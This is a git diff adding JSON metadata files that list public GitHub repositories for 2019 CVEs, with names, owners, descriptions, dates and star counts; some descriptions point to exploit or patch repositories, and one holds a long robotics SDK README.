"CVE-2019-11043", + "full_name": "k8gege\/CVE-2019-11043", + "owner": { + "login": "k8gege", + "id": 42312878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42312878?v=4", + "html_url": "https:\/\/github.com\/k8gege", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k8gege\/CVE-2019-11043", + "description": "Ladon POC Moudle CVE-2019-11043 (PHP-FPM + Ngnix)", + "fork": false, + "created_at": "2019-11-11T11:29:54Z", + "updated_at": "2024-08-12T19:54:44Z", + "pushed_at": "2019-11-11T11:59:52Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-11043", + "ladon", + "ladon-poc", + "ngnix", + "php-fpm", + "poc" + ], + "visibility": "public", + "forks": 15, + "watchers": 16, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 222200768, + "name": "CVE-2019-11043_env", + "full_name": "moniik\/CVE-2019-11043_env", + "owner": { + "login": "moniik", + "id": 40794673, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40794673?v=4", + "html_url": "https:\/\/github.com\/moniik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/moniik\/CVE-2019-11043_env", + "description": "remote debug environment for CLion", + "fork": false, + "created_at": "2019-11-17T05:16:02Z", + "updated_at": "2024-08-12T19:54:56Z", + "pushed_at": "2019-11-17T05:19:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 261416297, + "name": "CVE-2019-11043", + "full_name": "kriskhub\/CVE-2019-11043", + "owner": { + "login": "kriskhub", + "id": 33716709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33716709?v=4", + "html_url": "https:\/\/github.com\/kriskhub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kriskhub\/CVE-2019-11043", + "description": "This repository provides a dockerized infrastructure and a python implementation of the CVE-2019-11043 exploit.", + "fork": false, + "created_at": "2020-05-05T09:43:44Z", + "updated_at": "2024-10-23T19:31:54Z", + "pushed_at": "2020-05-25T05:53:56Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 263386812, + "name": "cve-2019-11043", + "full_name": "alokaranasinghe\/cve-2019-11043", + "owner": { + "login": "alokaranasinghe", + "id": 62976136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62976136?v=4", + "html_url": "https:\/\/github.com\/alokaranasinghe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alokaranasinghe\/cve-2019-11043", + "description": null, + "fork": false, + "created_at": "2020-05-12T16:09:59Z", + "updated_at": "2024-08-12T20:01:25Z", + "pushed_at": "2020-05-12T16:16:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 279356597, + "name": "CVE-2019-11043", + "full_name": "corifeo\/CVE-2019-11043", + "owner": { + "login": "corifeo", + "id": 985710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/985710?v=4", + "html_url": "https:\/\/github.com\/corifeo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corifeo\/CVE-2019-11043", + "description": "quick and dirty PHP RCE proof of concept", + "fork": false, + "created_at": "2020-07-13T16:32:15Z", + "updated_at": "2024-08-12T20:03:41Z", + "pushed_at": "2020-07-13T16:33:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "php", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 313855291, + "name": "CVE-2019-11043", + "full_name": "lindemer\/CVE-2019-11043", + "owner": { + "login": "lindemer", + "id": 9827743, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9827743?v=4", + "html_url": "https:\/\/github.com\/lindemer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lindemer\/CVE-2019-11043", + "description": "PHP-FPM Remote Command Execution Exploit", + "fork": false, + "created_at": "2020-11-18T07:25:37Z", + "updated_at": "2024-02-27T01:58:12Z", + "pushed_at": "2020-11-20T10:53:26Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 394677091, + "name": "php_hack", + "full_name": "jptr218\/php_hack", + "owner": { + "login": "jptr218", + "id": 84092766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84092766?v=4", + "html_url": "https:\/\/github.com\/jptr218", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jptr218\/php_hack", + "description": "CVE-2019-11043", + "fork": false, + "created_at": "2021-08-10T14:06:27Z", + "updated_at": "2021-09-18T03:03:10Z", + "pushed_at": "2021-08-10T14:14:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 466193183, + "name": "CVE-2019-11043", + "full_name": "jas9reet\/CVE-2019-11043", + "owner": { + "login": "jas9reet", + "id": 34741406, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34741406?v=4", + "html_url": "https:\/\/github.com\/jas9reet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas9reet\/CVE-2019-11043", + "description": "CVE-2019-11043 LAB", + "fork": false, + "created_at": "2022-03-04T16:25:16Z", + "updated_at": "2022-03-06T07:42:17Z", + "pushed_at": "2022-03-06T07:42:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11061.json b/2019/CVE-2019-11061.json new file mode 100644 index 0000000000..b62565fe67 --- /dev/null +++ b/2019/CVE-2019-11061.json @@ -0,0 +1,33 @@ +[ + { + "id": 178342166, + "name": "ASUS-SmartHome-Exploit", + "full_name": "tim124058\/ASUS-SmartHome-Exploit", + "owner": { + "login": "tim124058", + "id": 12321191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12321191?v=4", + "html_url": "https:\/\/github.com\/tim124058", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tim124058\/ASUS-SmartHome-Exploit", + "description": "ASUS SmartHome Exploit for CVE-2019-11061 and CVE-2019-11063", + "fork": false, + "created_at": "2019-03-29T06:01:49Z", + "updated_at": "2024-08-12T19:47:24Z", + "pushed_at": "2019-08-27T04:23:24Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 23, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11076.json b/2019/CVE-2019-11076.json new file mode 100644 index 0000000000..f5d883f1d9 --- /dev/null +++ b/2019/CVE-2019-11076.json @@ -0,0 +1,33 @@ +[ + { + "id": 180679185, + "name": "poc-cribl-rce", + "full_name": "livehybrid\/poc-cribl-rce", + "owner": { + "login": "livehybrid", + "id": 5527349, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5527349?v=4", + "html_url": "https:\/\/github.com\/livehybrid", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/livehybrid\/poc-cribl-rce", + "description": "CVE-2019-11076 - Cribl UI 1.5.0 allows remote attackers to run arbitrary commands via an unauthenticated web request", + "fork": false, + "created_at": "2019-04-10T23:31:39Z", + "updated_at": "2024-08-12T19:47:48Z", + "pushed_at": "2019-04-11T12:50:39Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1108.json b/2019/CVE-2019-1108.json new file mode 100644 index 0000000000..94ca1c9063 --- /dev/null +++ b/2019/CVE-2019-1108.json @@ -0,0 +1,33 @@ +[ + { + "id": 233756730, + "name": "cve-2019-1108", + "full_name": "Lanph3re\/cve-2019-1108", + "owner": { + "login": "Lanph3re", + "id": 47443280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47443280?v=4", + "html_url": "https:\/\/github.com\/Lanph3re", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lanph3re\/cve-2019-1108", + "description": null, + "fork": false, + "created_at": "2020-01-14T04:31:17Z", + "updated_at": "2024-08-12T19:56:36Z", + "pushed_at": "2020-01-14T04:36:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11157.json b/2019/CVE-2019-11157.json new file mode 100644 index 0000000000..3f4bf6268f --- /dev/null +++ b/2019/CVE-2019-11157.json @@ -0,0 +1,33 @@ +[ + { + "id": 228203919, + "name": "v0ltpwn", + "full_name": "zkenjar\/v0ltpwn", + "owner": { + "login": "zkenjar", + "id": 9324632, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9324632?v=4", + "html_url": "https:\/\/github.com\/zkenjar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zkenjar\/v0ltpwn", + "description": "Tool Suite for V0LTpwn (CVE-2019-11157). Code will be published soon.", + "fork": false, + "created_at": "2019-12-15T15:11:07Z", + "updated_at": "2024-10-19T15:32:17Z", + "pushed_at": "2019-12-16T22:32:06Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11223.json b/2019/CVE-2019-11223.json new file mode 100644 index 0000000000..5261307bc7 --- /dev/null +++ b/2019/CVE-2019-11223.json @@ -0,0 +1,33 @@ +[ + { + "id": 181940820, + "name": "CVE-2019-11223", + "full_name": "AngelCtulhu\/CVE-2019-11223", + "owner": { + "login": "AngelCtulhu", + "id": 36587659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36587659?v=4", + "html_url": "https:\/\/github.com\/AngelCtulhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AngelCtulhu\/CVE-2019-11223", + "description": "CVE-2019-11223 - Arbitrary File Upload in Wordpress Support Candy Plugin Version 2.0 Below", + "fork": false, + "created_at": "2019-04-17T17:43:46Z", + "updated_at": "2024-08-12T19:48:00Z", + "pushed_at": "2019-04-19T04:32:38Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11224.json b/2019/CVE-2019-11224.json new file mode 100644 index 0000000000..f3bdf78138 --- /dev/null +++ b/2019/CVE-2019-11224.json @@ -0,0 +1,33 @@ +[ + { + "id": 287360043, + "name": "CVE-2019-11224", + "full_name": "Insecurities\/CVE-2019-11224", + "owner": { + "login": "Insecurities", + "id": 25147162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25147162?v=4", + "html_url": "https:\/\/github.com\/Insecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Insecurities\/CVE-2019-11224", + "description": "Modero AMX Code Execution (CVE-2019–11224) ", + "fork": false, + "created_at": "2020-08-13T19:07:36Z", + "updated_at": "2021-12-10T08:39:54Z", + "pushed_at": "2021-12-10T08:39:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1125.json b/2019/CVE-2019-1125.json new file mode 100644 index 0000000000..e2974d4919 --- /dev/null +++ b/2019/CVE-2019-1125.json @@ -0,0 +1,33 @@ +[ + { + "id": 236485605, + "name": "swapgs-attack-poc", + "full_name": "bitdefender\/swapgs-attack-poc", + "owner": { + "login": "bitdefender", + "id": 32452258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32452258?v=4", + "html_url": "https:\/\/github.com\/bitdefender", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bitdefender\/swapgs-attack-poc", + "description": "This repository contains the sources and documentation for the SWAPGS attack PoC (CVE-2019-1125)", + "fork": false, + "created_at": "2020-01-27T12:27:53Z", + "updated_at": "2024-09-06T13:23:41Z", + "pushed_at": "2020-01-27T12:32:04Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 41, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1132.json b/2019/CVE-2019-1132.json new file mode 100644 index 0000000000..acec40d4df --- /dev/null +++ b/2019/CVE-2019-1132.json @@ -0,0 +1,64 @@ +[ + { + "id": 198963113, + "name": "CVE-2019-1132", + "full_name": "Vlad-tri\/CVE-2019-1132", + "owner": { + "login": "Vlad-tri", + "id": 20975540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20975540?v=4", + "html_url": "https:\/\/github.com\/Vlad-tri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vlad-tri\/CVE-2019-1132", + "description": "EoP POC for CVE-2019-1132", + "fork": false, + "created_at": "2019-07-26T06:51:28Z", + "updated_at": "2024-08-12T19:51:24Z", + "pushed_at": "2019-09-08T07:58:12Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 38, + "watchers": 61, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 199763019, + "name": "CVE-2019-1132", + "full_name": "petercc\/CVE-2019-1132", + "owner": { + "login": "petercc", + "id": 1819628, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1819628?v=4", + "html_url": "https:\/\/github.com\/petercc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/petercc\/CVE-2019-1132", + "description": "CVE-2019-1132", + "fork": false, + "created_at": "2019-07-31T02:30:28Z", + "updated_at": "2024-08-12T19:51:32Z", + "pushed_at": "2019-07-31T02:38:41Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11358.json b/2019/CVE-2019-11358.json new file mode 100644 index 0000000000..1de157d5a8 --- /dev/null +++ b/2019/CVE-2019-11358.json @@ -0,0 +1,208 @@ +[ + { + "id": 178541701, + "name": "snyk-js-jquery-174006", + "full_name": "DanielRuf\/snyk-js-jquery-174006", + "owner": { + "login": "DanielRuf", + "id": 827205, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/827205?v=4", + "html_url": "https:\/\/github.com\/DanielRuf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DanielRuf\/snyk-js-jquery-174006", + "description": "patches for SNYK-JS-JQUERY-174006, CVE-2019-11358, CVE-2019-5428", + "fork": false, + "created_at": "2019-03-30T10:03:36Z", + "updated_at": "2024-03-22T11:34:08Z", + "pushed_at": "2022-08-22T12:01:25Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2019-11358", + "cve-2019-5428", + "jquery", + "patch", + "snyk", + "snyk-js-jquery-174006" + ], + "visibility": "public", + "forks": 21, + "watchers": 28, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 197643691, + "name": "jquery-prototype-pollution-fix", + "full_name": "bitnesswise\/jquery-prototype-pollution-fix", + "owner": { + "login": "bitnesswise", + "id": 32780182, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32780182?v=4", + "html_url": "https:\/\/github.com\/bitnesswise", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bitnesswise\/jquery-prototype-pollution-fix", + "description": "A fix for CVE-2019-11358 (prototype pollution in jquery)", + "fork": false, + "created_at": "2019-07-18T19:15:33Z", + "updated_at": "2024-08-12T19:51:11Z", + "pushed_at": "2019-07-18T20:00:15Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 255702097, + "name": "snyk-js-jquery-565129", + "full_name": "DanielRuf\/snyk-js-jquery-565129", + "owner": { + "login": "DanielRuf", + "id": 827205, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/827205?v=4", + "html_url": "https:\/\/github.com\/DanielRuf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DanielRuf\/snyk-js-jquery-565129", + "description": "patches for SNYK-JS-JQUERY-565129, SNYK-JS-JQUERY-567880, CVE-2020-1102, CVE-2020-11023, includes the patches for SNYK-JS-JQUERY-174006, CVE-2019-11358, CVE-2019-5428", + "fork": false, + "created_at": "2020-04-14T19:12:01Z", + "updated_at": "2024-10-05T19:47:38Z", + "pushed_at": "2022-08-22T12:00:56Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2019-11358", + "cve-2019-5428", + "cve-2020-11022", + "cve-2020-11023", + "jquery", + "patch", + "snyk", + "snyk-js-jquery-174006", + "snyk-js-jquery-565129", + "snyk-js-jquery-567880" + ], + "visibility": "public", + "forks": 10, + "watchers": 26, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 345634228, + "name": "FTC-Skystone-Dark-Angels-Romania-2020", + "full_name": "chrisneagu\/FTC-Skystone-Dark-Angels-Romania-2020", + "owner": { + "login": "chrisneagu", + "id": 57600322, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57600322?v=4", + "html_url": "https:\/\/github.com\/chrisneagu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chrisneagu\/FTC-Skystone-Dark-Angels-Romania-2020", + "description": "NOTICE This repository contains the public FTC SDK for the SKYSTONE (2019-2020) competition season. If you are looking for the current season's FTC SDK software, please visit the new and permanent home of the public FTC SDK: FtcRobotController repository Welcome! This GitHub repository contains the source code that is used to build an Android app to control a FIRST Tech Challenge competition robot. To use this SDK, download\/clone the entire project to your local computer. Getting Started If you are new to robotics or new to the FIRST Tech Challenge, then you should consider reviewing the FTC Blocks Tutorial to get familiar with how to use the control system: FTC Blocks Online Tutorial Even if you are an advanced Java programmer, it is helpful to start with the FTC Blocks tutorial, and then migrate to the OnBot Java Tool or to Android Studio afterwards. Downloading the Project If you are an Android Studio programmer, there are several ways to download this repo. Note that if you use the Blocks or OnBot Java Tool to program your robot, then you do not need to download this repository. If you are a git user, you can clone the most current version of the repository: git clone https:\/\/github.com\/FIRST-Tech-Challenge\/SKYSTONE.git Or, if you prefer, you can use the \"Download Zip\" button available through the main repository page. Downloading the project as a .ZIP file will keep the size of the download manageable. You can also download the project folder (as a .zip or .tar.gz archive file) from the Downloads subsection of the Releases page for this repository. Once you have downloaded and uncompressed (if needed) your folder, you can use Android Studio to import the folder (\"Import project (Eclipse ADT, Gradle, etc.)\"). Getting Help User Documentation and Tutorials FIRST maintains online documentation with information and tutorials on how to use the FIRST Tech Challenge software and robot control system. You can access this documentation using the following link: SKYSTONE Online Documentation Note that the online documentation is an \"evergreen\" document that is constantly being updated and edited. It contains the most current information about the FIRST Tech Challenge software and control system. Javadoc Reference Material The Javadoc reference documentation for the FTC SDK is now available online. Click on the following link to view the FTC SDK Javadoc documentation as a live website: FTC Javadoc Documentation Documentation for the FTC SDK is also included with this repository. There is a subfolder called \"doc\" which contains several subfolders: The folder \"apk\" contains the .apk files for the FTC Driver Station and FTC Robot Controller apps. The folder \"javadoc\" contains the JavaDoc user documentation for the FTC SDK. Online User Forum For technical questions regarding the Control System or the FTC SDK, please visit the FTC Technology forum: FTC Technology Forum Release Information Version 5.5 (20200824-090813) Version 5.5 requires Android Studio 4.0 or later. New features Adds support for calling custom Java classes from Blocks OpModes (fixes SkyStone issue #161). Classes must be in the org.firstinspires.ftc.teamcode package. Methods must be public static and have no more than 21 parameters. Parameters declared as OpMode, LinearOpMode, Telemetry, and HardwareMap are supported and the argument is provided automatically, regardless of the order of the parameters. On the block, the sockets for those parameters are automatically filled in. Parameters declared as char or java.lang.Character will accept any block that returns text and will only use the first character in the text. Parameters declared as boolean or java.lang.Boolean will accept any block that returns boolean. Parameters declared as byte, java.lang.Byte, short, java.lang.Short, int, java.lang.Integer, long, or java.lang.Long, will accept any block that returns a number and will round that value to the nearest whole number. Parameters declared as float, java.lang.Float, double, java.lang.Double will accept any block that returns a number. Adds telemetry API method for setting display format Classic Monospace HTML (certain tags only) Adds blocks support for switching cameras. Adds Blocks support for TensorFlow Object Detection with a custom model. Adds support for uploading a custom TensorFlow Object Detection model in the Manage page, which is especially useful for Blocks and OnBotJava users. Shows new Control Hub blink codes when the WiFi band is switched using the Control Hub's button (only possible on Control Hub OS 1.1.2) Adds new warnings which can be disabled in the Advanced RC Settings Mismatched app versions warning Unnecessary 2.4 GHz WiFi usage warning REV Hub is running outdated firmware (older than version 1.8.2) Adds support for Sony PS4 gamepad, and reworks how gamepads work on the Driver Station Removes preference which sets gamepad type based on driver position. Replaced with menu which allows specifying type for gamepads with unknown VID and PID Attempts to auto-detect gamepad type based on USB VID and PID If gamepad VID and PID is not known, use type specified by user for that VID and PID If gamepad VID and PID is not known AND the user has not specified a type for that VID and PID, an educated guess is made about how to map the gamepad Driver Station will now attempt to automatically recover from a gamepad disconnecting, and re-assign it to the position it was assigned to when it dropped If only one gamepad is assigned and it drops: it can be recovered If two gamepads are assigned, and have different VID\/PID signatures, and only one drops: it will be recovered If two gamepads are assigned, and have different VID\/PID signatures, and BOTH drop: both will be recovered If two gamepads are assigned, and have the same VID\/PID signatures, and only one drops: it will be recovered If two gamepads are assigned, and have the same VID\/PID signatures, and BOTH drop: neither will be recovered, because of the ambiguity of the gamepads when they re-appear on the USB bus. There is currently one known edge case: if there are two gamepads with the same VID\/PID signature plugged in, but only one is assigned, and they BOTH drop, it's a 50-50 chance of which one will be chosen for automatic recovery to the assigned position: it is determined by whichever one is re-enumerated first by the USB bus controller. Adds landscape user interface to Driver Station New feature: practice timer with audio cues New feature (Control Hub only): wireless network connection strength indicator (0-5 bars) New feature (Control Hub only): tapping on the ping\/channel display will switch to an alternate display showing radio RX dBm and link speed (tap again to switch back) The layout will NOT autorotate. You can switch the layout from the Driver Station's settings menu. Breaking changes Removes support for Android versions 4.4 through 5.1 (KitKat and Lollipop). The minSdkVersion is now 23. Removes the deprecated LinearOpMode methods waitOneFullHardwareCycle() and waitForNextHardwareCycle() Enhancements Handles RS485 address of Control Hub automatically The Control Hub is automatically given a reserved address Existing configuration files will continue to work All addresses in the range of 1-10 are still available for Expansion Hubs The Control Hub light will now normally be solid green, without blinking to indicate the address The Control Hub will not be shown on the Expansion Hub Address Change settings page Improves REV Hub firmware updater The user can now choose between all available firmware update files Version 1.8.2 of the REV Hub firmware is bundled into the Robot Controller app. Text was added to clarify that Expansion Hubs can only be updated via USB. Firmware update speed was reduced to improve reliability Allows REV Hub firmware to be updated directly from the Manage webpage Improves log viewer on Robot Controller Horizontal scrolling support (no longer word wrapped) Supports pinch-to-zoom Uses a monospaced font Error messages are highlighted New color scheme Attempts to force-stop a runaway\/stuck OpMode without restarting the entire app Not all types of runaway conditions are stoppable, but if the user code attempts to talk to hardware during the runaway, the system should be able to capture it. Makes various tweaks to the Self Inspect screen Renames \"OS version\" entry to \"Android version\" Renames \"WiFi Direct Name\" to \"WiFi Name\" Adds Control Hub OS version, when viewing the report of a Control Hub Hides the airplane mode entry, when viewing the report of a Control Hub Removes check for ZTE Speed Channel Changer Shows firmware version for all Expansion and Control Hubs Reworks network settings portion of Manage page All network settings are now applied with a single click The WiFi Direct channel of phone-based Robot Controllers can now be changed from the Manage page WiFi channels are filtered by band (2.4 vs 5 GHz) and whether they overlap with other channels The current WiFi channel is pre-selected on phone-based Robot Controllers, and Control Hubs running OS 1.1.2 or later. On Control Hubs running OS 1.1.2 or later, you can choose to have the system automatically select a channel on the 5 GHz band Improves OnBotJava New light and dark themes replace the old themes (chaos, github, chrome,...) the new default theme is light and will be used when you first update to this version OnBotJava now has a tabbed editor Read-only offline mode Improves function of \"exit\" menu item on Robot Controller and Driver Station Now guaranteed to be fully stopped and unloaded from memory Shows a warning message if a LinearOpMode exists prematurely due to failure to monitor for the start condition Improves error message shown when the Driver Station and Robot Controller are incompatible with each other Driver Station OpMode Control Panel now disabled while a Restart Robot is in progress Disables advanced settings related to WiFi direct when the Robot Controller is a Control Hub. Tint phone battery icons on Driver Station when low\/critical. Uses names \"Control Hub Portal\" and \"Control Hub\" (when appropriate) in new configuration files Improve I2C read performance Very large improvement on Control Hub; up to ~2x faster with small (e.g. 6 byte) reads Not as apparent on Expansion Hubs connected to a phone Update\/refresh build infrastructure Update to 'androidx' support library from 'com.android.support:appcompat', which is end-of-life Update targetSdkVersion and compileSdkVersion to 28 Update Android Studio's Android plugin to latest Fix reported build timestamp in 'About' screen Add sample illustrating manual webcam use: ConceptWebcam Bug fixes Fixes SkyStone issue #248 Fixes SkyStone issue #232 and modifies bulk caching semantics to allow for cache-preserving MANUAL\/AUTO transitions. Improves performance when REV 2M distance sensor is unplugged Improves readability of Toast messages on certain devices Allows a Driver Station to connect to a Robot Controller after another has disconnected Improves generation of fake serial numbers for UVC cameras which do not provide a real serial number Previously some devices would assign such cameras a serial of 0:0 and fail to open and start streaming Fixes ftc_app issue #638. Fixes a slew of bugs with the Vuforia camera monitor including: Fixes bug where preview could be displayed with a wonky aspect ratio Fixes bug where preview could be cut off in landscape Fixes bug where preview got totally messed up when rotating phone Fixes bug where crosshair could drift off target when using webcams Fixes issue in UVC driver on some devices (ftc_app 681) if streaming was started\/stopped multiple times in a row Issue manifested as kernel panic on devices which do not have this kernel patch. On affected devices which do have the patch, the issue was manifest as simply a failure to start streaming. The Tech Team believes that the root cause of the issue is a bug in the Linux kernel XHCI driver. A workaround was implemented in the SDK UVC driver. Fixes bug in UVC driver where often half the frames from the camera would be dropped (e.g. only 15FPS delivered during a streaming session configured for 30FPS). Fixes issue where TensorFlow Object Detection would show results whose confidence was lower than the minimum confidence parameter. Fixes a potential exploitation issue of CVE-2019-11358 in OnBotJava Fixes changing the address of an Expansion Hub with additional Expansion Hubs connected to it Preserves the Control Hub's network connection when \"Restart Robot\" is selected Fixes issue where device scans would fail while the Robot was restarting Fix RenderScript usage Use androidx.renderscript variant: increased compatibility Use RenderScript in Java mode, not native: simplifies build Fixes webcam-frame-to-bitmap conversion problem: alpha channel wasn't being initialized, only R, G, & B Fixes possible arithmetic overflow in Deadline Fixes deadlock in Vuforia webcam support which could cause 5-second delays when stopping OpMode Version 5.4 (20200108-101156) Fixes SkyStone issue #88 Adds an inspection item that notes when a robot controller (Control Hub) is using the factory default password. Fixes SkyStone issue #61 Fixes SkyStone issue #142 Fixes ftc_app issue #417 by adding more current and voltage monitoring capabilities for REV Hubs. Fixes a crash sometimes caused by OnBotJava activity Improves OnBotJava autosave functionality ftc_app #738 Fixes system responsiveness issue when an Expansion Hub is disconnected Fixes issue where IMU initialization could prevent Op Modes from stopping Fixes issue where AndroidTextToSpeech.speak() would fail if it was called too early Adds telemetry.speak() methods and blocks, which cause the Driver Station (if also updated) to speak text Adds and improves Expansion Hub-related warnings Improves Expansion Hub low battery warning Displays the warning immediately after the hub reports it Specifies whether the condition is current or occurred temporarily during an OpMode run Displays which hubs reported low battery Displays warning when hub loses and regains power during an OpMode run Fixes the hub's LED pattern after this condition Displays warning when Expansion Hub is 